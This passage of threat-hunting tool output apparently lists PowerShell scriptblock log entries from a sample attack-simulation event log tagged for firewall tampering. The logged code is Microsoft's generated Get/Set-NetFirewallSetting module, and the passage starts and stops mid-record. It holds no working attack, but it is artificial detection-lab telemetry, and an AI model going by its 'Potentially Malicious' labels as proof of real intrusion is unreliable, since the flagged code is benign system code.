($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmdletization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$_",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.531 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecuritySettingData' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function 
__cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSetting' -Alias '*' function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] 
[ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query 
(cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName 
)) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmdletization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$_",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.531 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"_cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { 
[object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSetting' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.531 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"_cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = 
